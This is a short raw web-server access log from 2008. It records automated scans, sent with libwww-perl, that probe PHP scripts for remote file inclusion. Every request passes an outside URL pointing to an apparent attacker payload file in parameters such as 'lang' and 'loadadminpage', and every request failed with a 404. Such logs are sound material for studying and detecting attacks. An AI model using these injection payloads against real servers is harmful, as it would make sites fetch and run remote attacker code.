211.239.165.202 - - [21/Aug/2008:11:45:25 -0700] "GET /logs//include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:45:25 -0700] "GET /logs//include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:45:25 -0700] "GET //include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.187.25.20 - - [21/Aug/2008:11:45:37 -0700] "GET /logs/access_080713.log//admin/frontpage_right.php?loadadminpage=http://www.computercreationscorp.com/dmdocuments/z6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
